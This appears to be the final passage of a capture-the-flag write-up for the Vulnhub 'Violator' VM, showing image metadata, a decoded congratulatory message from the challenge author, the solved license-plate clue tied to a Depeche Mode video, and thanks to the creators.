About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04
I was unable to get the Minarke program to work, but a different decoder decoded the text for me. I just had to fix up the spacing to fully read the message.
ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE
An update on knightmare's Twitter tells us that the final message should read BGH 393X. A little research leads us to a message board which tells us that this is the license plate of the 1981 Ford Cortina MkV in the music video for the Depeche Mode song ‘Useless’.
Overall this was a fun VM with plenty of twists and turns. I learned some new techniques and a bit about the band Depeche Mode. Thank you knightmare for the challenge and for sharing a bit of culture with us.
As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.
Until next time, enjoy the music!